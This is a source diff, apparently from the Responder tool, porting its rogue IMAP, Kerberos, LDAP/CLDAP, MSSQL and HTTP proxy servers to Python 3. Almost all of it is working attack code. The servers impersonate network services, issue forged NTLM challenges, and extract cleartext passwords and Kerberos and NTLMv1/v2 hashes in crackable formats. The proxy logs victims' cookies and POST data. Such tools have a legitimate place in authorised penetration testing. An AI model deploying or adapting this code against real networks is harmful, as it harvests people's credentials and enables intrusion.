 			URL_Unparse = urlparse.urlunparse(('', '', path, params, query, ''))
 
 			if self._connect_to(netloc, soc):
-				soc.send("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version))
+				soc.send(NetworkSendBufferPython2or3("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version)))
 
 				Cookie = self.headers['Cookie'] if "Cookie" in self.headers else ''
 
 				if settings.Config.Verbose:
-					print text("[PROXY] Client        : %s" % color(self.client_address[0], 3))
-					print text("[PROXY] Requested URL : %s" % color(self.path, 3))
-					print text("[PROXY] Cookie        : %s" % Cookie)
+					print(text("[PROXY] Client        : %s" % color(self.client_address[0], 3)))
+					print(text("[PROXY] Requested URL : %s" % color(self.path, 3)))
+					print(text("[PROXY] Cookie        : %s" % Cookie))
 
 				self.headers['Connection'] = 'close'
 				del self.headers['Proxy-Connection']
@@ -286,8 +295,8 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 				del self.headers['Range']
 				
 				for k, v in self.headers.items():
-					soc.send("%s: %s\r\n" % (k.title(), v))
-				soc.send("\r\n")
+					soc.send(NetworkSendBufferPython2or3("%s: %s\r\n" % (k.title(), v)))
+				soc.send(NetworkSendBufferPython2or3("\r\n"))
 
 				try:
 					self._read_write(soc, netloc)
@@ -325,13 +334,14 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 						try:
 							data = i.recv(4096)
 
-							if self.command == "POST" and settings.Config.Verbose:
-								print text("[PROXY] POST Data     : %s" % data)
+							if self.command == b'POST' and settings.Config.Verbose:
+								print(text("[PROXY] POST Data     : %s" % data))
 						except:
 							pass
 					if data:
 						try:
 							out.send(data)
+
 							count = 0
 						except:
 							pass
@@ -344,3 +354,4 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 	do_POST = do_GET
 	do_PUT  = do_GET
 	do_DELETE=do_GET
+

servers/IMAP.py

@@ -14,36 +14,35 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys
 from utils import *
-from SocketServer import BaseRequestHandler
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
 
 class IMAP(BaseRequestHandler):
 	def handle(self):
 		try:
-			self.request.send(str(IMAPGreeting()))
+			self.request.send(NetworkSendBufferPython2or3(IMAPGreeting()))
 			data = self.request.recv(1024)
-
-			if data[5:15] == "CAPABILITY":
+			if data[5:15] == b'CAPABILITY':
 				RequestTag = data[0:4]
-				self.request.send(str(IMAPCapability()))
-				self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag)))
+				self.request.send(NetworkSendBufferPython2or3(IMAPCapability()))
+				self.request.send(NetworkSendBufferPython2or3(IMAPCapabilityEnd(Tag=RequestTag.decode("latin-1"))))
 				data = self.request.recv(1024)
 
-			if data[5:10] == "LOGIN":
-				Credentials = data[10:].strip()
-
+			if data[5:10] == b'LOGIN':
+				Credentials = data[10:].strip().decode("latin-1").split('"')
 				SaveToDb({
 					'module': 'IMAP', 
 					'type': 'Cleartext', 
 					'client': self.client_address[0], 
-					'user': Credentials[0], 
-					'cleartext': Credentials[1], 
-					'fullhash': Credentials[0]+":"+Credentials[1],
+					'user': Credentials[1], 
+					'cleartext': Credentials[3], 
+					'fullhash': Credentials[1]+":"+Credentials[3],
 				})
 
-				## FIXME: Close connection properly
-				## self.request.send(str(ditchthisconnection()))
-				## data = self.request.recv(1024)
 		except Exception:
 			pass

servers/Kerberos.py

@@ -14,56 +14,61 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler
-from utils import *
+import codecs
 import struct
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
 
 def ParseMSKerbv5TCP(Data):
 	MsgType     = Data[21:22]
 	EncType     = Data[43:44]
 	MessageType = Data[32:33]
 
-	if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
-		if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
+	if MsgType == b'\x0a' and EncType == b'\x17' and MessageType ==b'\x02':
+		if Data[49:53] == b'\xa2\x36\x04\x34' or Data[49:53] == b'\xa2\x35\x04\x33':
 			HashLen = struct.unpack('<b',Data[50:51])[0]
 			if HashLen == 54:
 				Hash       = Data[53:105]
 				SwitchHash = Hash[16:]+Hash[0:16]
 				NameLen    = struct.unpack('<b',Data[153:154])[0]
-				Name       = Data[154:154+NameLen]
+				Name       = Data[154:154+NameLen].decode('latin-1')
 				DomainLen  = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
-				Domain     = Data[154+NameLen+4:154+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				Domain     = Data[154+NameLen+4:154+NameLen+4+DomainLen].decode('latin-1')
+				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 				return BuildHash
 
-		if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
+		if Data[44:48] == b'\xa2\x36\x04\x34' or Data[44:48] == b'\xa2\x35\x04\x33':
 			HashLen = struct.unpack('<b',Data[45:46])[0]
 			if HashLen == 53:
 				Hash       = Data[48:99]
 				SwitchHash = Hash[16:]+Hash[0:16]
 				NameLen    = struct.unpack('<b',Data[147:148])[0]
-				Name       = Data[148:148+NameLen]
+				Name       = Data[148:148+NameLen].decode('latin-1')
 				DomainLen  = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
-				Domain     = Data[148+NameLen+4:148+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				Domain     = Data[148+NameLen+4:148+NameLen+4+DomainLen].decode('latin-1')
+				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 				return BuildHash
 			elif HashLen == 54:
 				Hash       = Data[53:105]
 				SwitchHash = Hash[16:]+Hash[0:16]
 				NameLen    = struct.unpack('<b',Data[148:149])[0]
-				Name       = Data[149:149+NameLen]
+				Name       = Data[149:149+NameLen].decode('latin-1')
 				DomainLen  = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
-				Domain     = Data[149+NameLen+4:149+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				Domain     = Data[149+NameLen+4:149+NameLen+4+DomainLen].decode('latin-1')
+				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 				return BuildHash
 		else:
 			Hash       = Data[48:100]
 			SwitchHash = Hash[16:]+Hash[0:16]
 			NameLen    = struct.unpack('<b',Data[148:149])[0]
-			Name       = Data[149:149+NameLen]
+			Name       = Data[149:149+NameLen].decode('latin-1')
 			DomainLen  = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
-			Domain     = Data[149+NameLen+4:149+NameLen+4+DomainLen]
-			BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+			Domain     = Data[149+NameLen+4:149+NameLen+4+DomainLen].decode('latin-1')
+			BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 			return BuildHash
 	return False
 
@@ -71,69 +76,74 @@ def ParseMSKerbv5UDP(Data):
 	MsgType = Data[17:18]
 	EncType = Data[39:40]
 
-	if MsgType == "\x0a" and EncType == "\x17":
-		if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
+	if MsgType == b'\x0a' and EncType == b'\x17':
+		if Data[40:44] == b'\xa2\x36\x04\x34' or Data[40:44] == b'\xa2\x35\x04\x33':
 			HashLen = struct.unpack('<b',Data[41:42])[0]
 			if HashLen == 54:
 				Hash       = Data[44:96]
 				SwitchHash = Hash[16:]+Hash[0:16]
 				NameLen    = struct.unpack('<b',Data[144:145])[0]
-				Name       = Data[145:145+NameLen]
+				Name       = Data[145:145+NameLen].decode('latin-1')
 				DomainLen  = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
-				Domain     = Data[145+NameLen+4:145+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				Domain     = Data[145+NameLen+4:145+NameLen+4+DomainLen].decode('latin-1')
+				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 				return BuildHash
 			elif HashLen == 53:
 				Hash       = Data[44:95]
 				SwitchHash = Hash[16:]+Hash[0:16]
 				NameLen    = struct.unpack('<b',Data[143:144])[0]
-				Name       = Data[144:144+NameLen]
+				Name       = Data[144:144+NameLen].decode('latin-1')
 				DomainLen  = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
-				Domain     = Data[144+NameLen+4:144+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				Domain     = Data[144+NameLen+4:144+NameLen+4+DomainLen].decode('latin-1')
+				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 				return BuildHash
 		else:
 			Hash       = Data[49:101]
 			SwitchHash = Hash[16:]+Hash[0:16]
 			NameLen    = struct.unpack('<b',Data[149:150])[0]
-			Name       = Data[150:150+NameLen]
+			Name       = Data[150:150+NameLen].decode('latin-1')
 			DomainLen  = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
-			Domain     = Data[150+NameLen+4:150+NameLen+4+DomainLen]
-			BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+			Domain     = Data[150+NameLen+4:150+NameLen+4+DomainLen].decode('latin-1')
+			BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 			return BuildHash
 	return False
 
 class KerbTCP(BaseRequestHandler):
 	def handle(self):
-		data = self.request.recv(1024)
-		KerbHash = ParseMSKerbv5TCP(data)
+		try:
+			data = self.request.recv(1024)
+			KerbHash = ParseMSKerbv5TCP(data)
 
-		if KerbHash:
-			n, krb, v, name, domain, d, h = KerbHash.split('$')
+			if KerbHash:
+				n, krb, v, name, domain, d, h = KerbHash.split('$')
 
-			SaveToDb({
-				'module': 'KERB',
-				'type': 'MSKerbv5',
-				'client': self.client_address[0],
-				'user': domain+'\\'+name,
-				'hash': h,
-				'fullhash': KerbHash,
-			})
+				SaveToDb({
+					'module': 'KERB',
+					'type': 'MSKerbv5',
+					'client': self.client_address[0],
+					'user': domain+'\\'+name,
+					'hash': h,
+					'fullhash': KerbHash,
+				})
+		except:
+			pass
 
 class KerbUDP(BaseRequestHandler):
-
 	def handle(self):
-		data, soc = self.request
-		KerbHash = ParseMSKerbv5UDP(data)
+		try:
+			data, soc = self.request
+			KerbHash = ParseMSKerbv5UDP(data)
 
-		if KerbHash:
-			(n, krb, v, name, domain, d, h) = KerbHash.split('$')
+			if KerbHash:
+				(n, krb, v, name, domain, d, h) = KerbHash.split('$')
 
-			SaveToDb({
-				'module': 'KERB',
-				'type': 'MSKerbv5',
-				'client': self.client_address[0],
-				'user': domain+'\\'+name,
-				'hash': h,
-				'fullhash': KerbHash,
-			})
+				SaveToDb({
+					'module': 'KERB',
+					'type': 'MSKerbv5',
+					'client': self.client_address[0],
+					'user': domain+'\\'+name,
+					'hash': h,
+					'fullhash': KerbHash,
+				})
+		except:
+			pass

servers/LDAP.py

@@ -14,78 +14,150 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler
-from packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge
+import sys
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+from packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge, CLDAPNetlogon
 from utils import *
 import struct
+import codecs
+import random
+
+def CalculateDNSName(name):
+	if isinstance(name, bytes):
+		name = name.decode('latin-1')
+	name = name.split(".")
+	DomainPrefix = struct.pack('B', len(name[0])).decode('latin-1')+name[0]
+	Dnslen = ''
+	for x in name:
+		if len(x) >=1:
+			Dnslen += struct.pack('B', len(x)).decode('latin-1')+x
+
+	return Dnslen, DomainPrefix
+
+def ParseCLDAPNetlogon(data):
+	try:
+		Dns = data.find(b'DnsDomain')
+		if Dns is -1:
+			return False
+		DnsName = data[Dns+9:]
+		DnsGuidOff = data.find(b'DomainGuid')
+		if DnsGuidOff is -1:
+			return False
+		Guid = data[DnsGuidOff+10:]
+		if Dns:
+			DomainLen = struct.unpack(">B", DnsName[1:2])[0]
+			DomainName = DnsName[2:2+DomainLen]
+
+		if Guid:
+			DomainGuidLen = struct.unpack(">B", Guid[1:2])[0]
+			DomainGuid = Guid[2:2+DomainGuidLen]
+		return DomainName, DomainGuid
+	except:
+		pass
+
 
 def ParseSearch(data):
-	if re.search(r'(objectClass)', data):
-		return str(LDAPSearchDefaultPacket(MessageIDASNStr=data[8:9]))
-	elif re.search(r'(?i)(objectClass0*.*supportedCapabilities)', data):
-		return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
-	elif re.search(r'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
-		return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
+	TID = data[8:9].decode('latin-1')
+	if re.search(b'Netlogon', data):
+		NbtName = settings.Config.MachineName
+		TID = NetworkRecvBufferPython2or3(data[8:10])
+		if TID[1] == "\x63":
+			TID = "\x00"+TID[0]
+		DomainName, DomainGuid = ParseCLDAPNetlogon(data)
+		DomainGuid = NetworkRecvBufferPython2or3(DomainGuid)
+		t = CLDAPNetlogon(MessageIDASNStr=TID ,CLDAPMessageIDStr=TID, NTLogonDomainGUID=DomainGuid, NTLogonForestName=CalculateDNSName(DomainName)[0],NTLogonPDCNBTName=CalculateDNSName(NbtName)[0], NTLogonDomainNBTName=CalculateDNSName(NbtName)[0],NTLogonDomainNameShort=CalculateDNSName(DomainName)[1])
+		t.calculate()
+		return str(t)
 
-def ParseLDAPHash(data, client):
-	SSPIStart = data[42:]
-	LMhashLen = struct.unpack('<H',data[54:56])[0]
+	elif re.search(b'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
+		return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=TID,MessageIDASN2Str=TID))
 
-	if LMhashLen > 10:
-		LMhashOffset = struct.unpack('<H',data[58:60])[0]
-		LMHash       = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-		
-		NthashLen    = struct.unpack('<H',data[64:66])[0]
-		NthashOffset = struct.unpack('<H',data[66:68])[0]
-		NtHash       = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-		
-		DomainLen    = struct.unpack('<H',data[72:74])[0]
-		DomainOffset = struct.unpack('<H',data[74:76])[0]
-		Domain       = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
-		
-		UserLen      = struct.unpack('<H',data[80:82])[0]
-		UserOffset   = struct.unpack('<H',data[82:84])[0]
-		User         = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
+	elif re.search(b'(?i)(objectClass0*.*supportedCapabilities)', data):
+		return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=TID,MessageIDASN2Str=TID))
 
-		WriteHash    = User + "::" + Domain + ":" + LMHash + ":" + NtHash + ":" + settings.Config.NumChal
+	if re.search(b'(objectClass)', data):
+		return str(LDAPSearchDefaultPacket(MessageIDASNStr=TID))
+
+def ParseLDAPHash(data,client, Challenge):  #Parse LDAP NTLMSSP v1/v2
+	SSPIStart  = data.find(b'NTLMSSP')
+	SSPIString = data[SSPIStart:]
+	LMhashLen    = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
+	LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
+	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash	     = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	NthashLen    = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
+	NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
+
+	if NthashLen == 24:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
 
 		SaveToDb({
-			'module': 'LDAP',
-			'type': 'NTLMv1',
-			'client': client,
-			'user': Domain+'\\'+User,
-			'hash': NtHash,
+			'module': 'LDAP', 
+			'type': 'NTLMv1-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+	if NthashLen > 60:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
+
+		SaveToDb({
+			'module': 'LDAP', 
+			'type': 'NTLMv2-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
 			'fullhash': WriteHash,
 		})
-	
 	if LMhashLen < 2 and settings.Config.Verbose:
-		print text("[LDAP] Ignoring anonymous NTLM authentication")
+		print(text("[LDAP] Ignoring anonymous NTLM authentication"))
 
-def ParseNTLM(data,client):
-	if re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data):
-		NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9],NTLMSSPNtServerChallenge=settings.Config.Challenge)
+def ParseNTLM(data,client, Challenge):
+	if re.search(b'(NTLMSSP\x00\x01\x00\x00\x00)', data):
+		NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9].decode('latin-1'),NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 		NTLMChall.calculate()
-		return str(NTLMChall)
-	elif re.search('(NTLMSSP\x00\x03\x00\x00\x00)', data):
-		ParseLDAPHash(data,client)
+		return NTLMChall
+	elif re.search(b'(NTLMSSP\x00\x03\x00\x00\x00)', data):
+		ParseLDAPHash(data, client, Challenge)
 
-def ParseLDAPPacket(data, client):
-	if data[1:2] == '\x84':
+def ParseCLDAPPacket(data, client, Challenge):
+	if data[1:2] == b'\x84':
+		Operation        = data[10:11]
 		PacketLen        = struct.unpack('>i',data[2:6])[0]
-		MessageSequence  = struct.unpack('<b',data[8:9])[0]
-		Operation        = data[9:10]
+		if Operation == b'\x84':
+			Operation = data[9:10]
 		sasl             = data[20:21]
 		OperationHeadLen = struct.unpack('>i',data[11:15])[0]
 		LDAPVersion      = struct.unpack('<b',data[17:18])[0]
-		
-		if Operation == "\x60":
+		if Operation == b'\x60':
 			UserDomainLen  = struct.unpack('<b',data[19:20])[0]
-			UserDomain     = data[20:20+UserDomainLen]
+			UserDomain     = data[20:20+UserDomainLen].decode('latin-1')
 			AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]
 
-			if AuthHeaderType == "\x80":
+			if AuthHeaderType == b'\x80':
 				PassLen   = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
-				Password  = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
+				Password  = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen].decode('latin-1')
 				SaveToDb({
 					'module': 'LDAP',
 					'type': 'Cleartext',
@@ -95,25 +167,112 @@ def ParseLDAPPacket(data, client):
 					'fullhash': UserDomain+':'+Password,
 				})
 			
-			if sasl == "\xA3":
-				Buffer = ParseNTLM(data,client)
+			if sasl == b'\xA3':
+				Buffer = ParseNTLM(data,client, Challenge)
 				return Buffer
 		
-		elif Operation == "\x63":
+		elif Operation == b'\x63':
+			Buffer = ParseSearch(data)
+			print(text('[CLDAP] Sent CLDAP pong to %s.'% client))
+			return Buffer
+
+		elif settings.Config.Verbose:
+			print(text('[CLDAP] Operation not supported'))
+
+	if data[5:6] == b'\x60':
+		UserLen = struct.unpack("<b",data[11:12])[0]
+		UserString = data[12:12+UserLen].decode('latin-1')
+		PassLen = struct.unpack("<b",data[12+UserLen+1:12+UserLen+2])[0]
+		PassStr = data[12+UserLen+2:12+UserLen+3+PassLen].decode('latin-1')
+		if settings.Config.Verbose:
+			print(text('[CLDAP] Attempting to parse an old simple Bind request.'))
+		SaveToDb({
+			'module': 'LDAP',
+			'type': 'Cleartext',
+			'client': client,
+			'user': UserString,
+			'cleartext': PassStr,
+			'fullhash': UserString+':'+PassStr,
+			})
+
+
+def ParseLDAPPacket(data, client, Challenge):
+	if data[1:2] == b'\x84':
+		PacketLen        = struct.unpack('>i',data[2:6])[0]
+		MessageSequence  = struct.unpack('<b',data[8:9])[0]
+		Operation        = data[9:10]
+		sasl             = data[20:21]
+		OperationHeadLen = struct.unpack('>i',data[11:15])[0]
+		LDAPVersion      = struct.unpack('<b',data[17:18])[0]
+		if Operation == b'\x60':#Bind
+			UserDomainLen  = struct.unpack('<b',data[19:20])[0]
+			UserDomain     = data[20:20+UserDomainLen].decode('latin-1')
+			AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]
+
+			if AuthHeaderType == b'\x80':
+				PassLen   = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
+				Password  = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen].decode('latin-1')
+				SaveToDb({
+					'module': 'LDAP',
+					'type': 'Cleartext',
+					'client': client,
+					'user': UserDomain,
+					'cleartext': Password,
+					'fullhash': UserDomain+':'+Password,
+				})
+			
+			if sasl == b'\xA3':
+				Buffer = ParseNTLM(data,client, Challenge)
+				return Buffer
+		
+		elif Operation == b'\x63':
 			Buffer = ParseSearch(data)
 			return Buffer
+
 		elif settings.Config.Verbose:
-			print text('[LDAP] Operation not supported')
+			print(text('[LDAP] Operation not supported'))
+
+	if data[5:6] == b'\x60':
+		UserLen = struct.unpack("<b",data[11:12])[0]
+		UserString = data[12:12+UserLen].decode('latin-1')
+		PassLen = struct.unpack("<b",data[12+UserLen+1:12+UserLen+2])[0]
+		PassStr = data[12+UserLen+2:12+UserLen+3+PassLen].decode('latin-1')
+		if settings.Config.Verbose:
+			print(text('[LDAP] Attempting to parse an old simple Bind request.'))
+		SaveToDb({
+			'module': 'LDAP',
+			'type': 'Cleartext',
+			'client': client,
+			'user': UserString,
+			'cleartext': PassStr,
+			'fullhash': UserString+':'+PassStr,
+			})
 
 class LDAP(BaseRequestHandler):
 	def handle(self):
 		try:
-			while True:
-				self.request.settimeout(0.5)
-				data = self.request.recv(8092)
-				Buffer = ParseLDAPPacket(data,self.client_address[0])
-
+			self.request.settimeout(1)
+			data = self.request.recv(8092)
+			Challenge = RandomChallenge()
+			for x in range(5):
+				Buffer = ParseLDAPPacket(data,self.client_address[0], Challenge)
 				if Buffer:
-					self.request.send(Buffer)
-		except socket.timeout:
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+				data = self.request.recv(8092)
+		except:
 			pass
+
+
+class CLDAP(BaseRequestHandler):
+	def handle(self):
+		try:
+			data, soc = self.request
+			Challenge = RandomChallenge()
+			for x in range(1):
+				Buffer = ParseCLDAPPacket(data,self.client_address[0], Challenge)
+				if Buffer:
+					soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
+				data, soc = self.request
+		except:
+			pass
+

servers/MSSQL.py

@@ -14,10 +14,16 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler
-from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
-from utils import *
+import random
 import struct
+import codecs
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
+
 
 class TDS_Login_Packet:
 	def __init__(self, data):
@@ -40,7 +46,7 @@ class TDS_Login_Packet:
 		LocaleLen         = struct.unpack('<h', data[74:76])[0]
 		DatabaseNameOff   = struct.unpack('<h', data[76:78])[0]
 		DatabaseNameLen   = struct.unpack('<h', data[78:80])[0]
-
+		data = NetworkRecvBufferPython2or3(data)
 		self.ClientName   = data[8+ClientNameOff:8+ClientNameOff+ClientNameLen*2].replace('\x00', '')
 		self.UserName     = data[8+UserNameOff:8+UserNameOff+UserNameLen*2].replace('\x00', '')
 		self.Password     = data[8+PasswordOff:8+PasswordOff+PasswordLen*2].replace('\x00', '')
@@ -51,28 +57,26 @@ class TDS_Login_Packet:
 		self.Locale       = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
 		self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
 
-
-def ParseSQLHash(data, client):
+def ParseSQLHash(data, client, Challenge):
 	SSPIStart     = data[8:]
-
 	LMhashLen     = struct.unpack('<H',data[20:22])[0]
 	LMhashOffset  = struct.unpack('<H',data[24:26])[0]
-	LMHash        = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-	
+	LMHash        = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash        = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
 	NthashLen     = struct.unpack('<H',data[30:32])[0]
 	NthashOffset  = struct.unpack('<H',data[32:34])[0]
-	NTHash        = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-	
+	NTHash        = SSPIStart[NthashOffset:NthashOffset+NthashLen]
+	NTHash        = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
 	DomainLen     = struct.unpack('<H',data[36:38])[0]
 	DomainOffset  = struct.unpack('<H',data[40:42])[0]
-	Domain        = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+	Domain        = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
 	
 	UserLen       = struct.unpack('<H',data[44:46])[0]
 	UserOffset    = struct.unpack('<H',data[48:50])[0]
-	User          = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
+	User          = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
 
 	if NthashLen == 24:
-		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, settings.Config.NumChal)
+		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, codecs.encode(Challenge,'hex').decode('latin-1'))
 
 		SaveToDb({
 			'module': 'MSSQL', 
@@ -84,7 +88,7 @@ def ParseSQLHash(data, client):
 		})
 
 	if NthashLen > 60:
-		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
+		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), NTHash[:32], NTHash[32:])
 		
 		SaveToDb({
 			'module': 'MSSQL', 
@@ -98,10 +102,10 @@ def ParseSQLHash(data, client):
 
 def ParseSqlClearTxtPwd(Pwd):
 	Pwd = map(ord,Pwd.replace('\xa5',''))
-	Pw = ''
+	Pw = b''
 	for x in Pwd:
-		Pw += hex(x ^ 0xa5)[::-1][:2].replace("x", "0").decode('hex')
-	return Pw
+		Pw += codecs.decode(hex(x ^ 0xa5)[::-1][:2].replace("x", "0"), 'hex')
+	return Pw.decode('latin-1')
 
 
 def ParseClearTextSQLPass(data, client):
@@ -119,32 +123,64 @@ def ParseClearTextSQLPass(data, client):
 # MSSQL Server class
 class MSSQL(BaseRequestHandler):
 	def handle(self):
-		if settings.Config.Verbose:
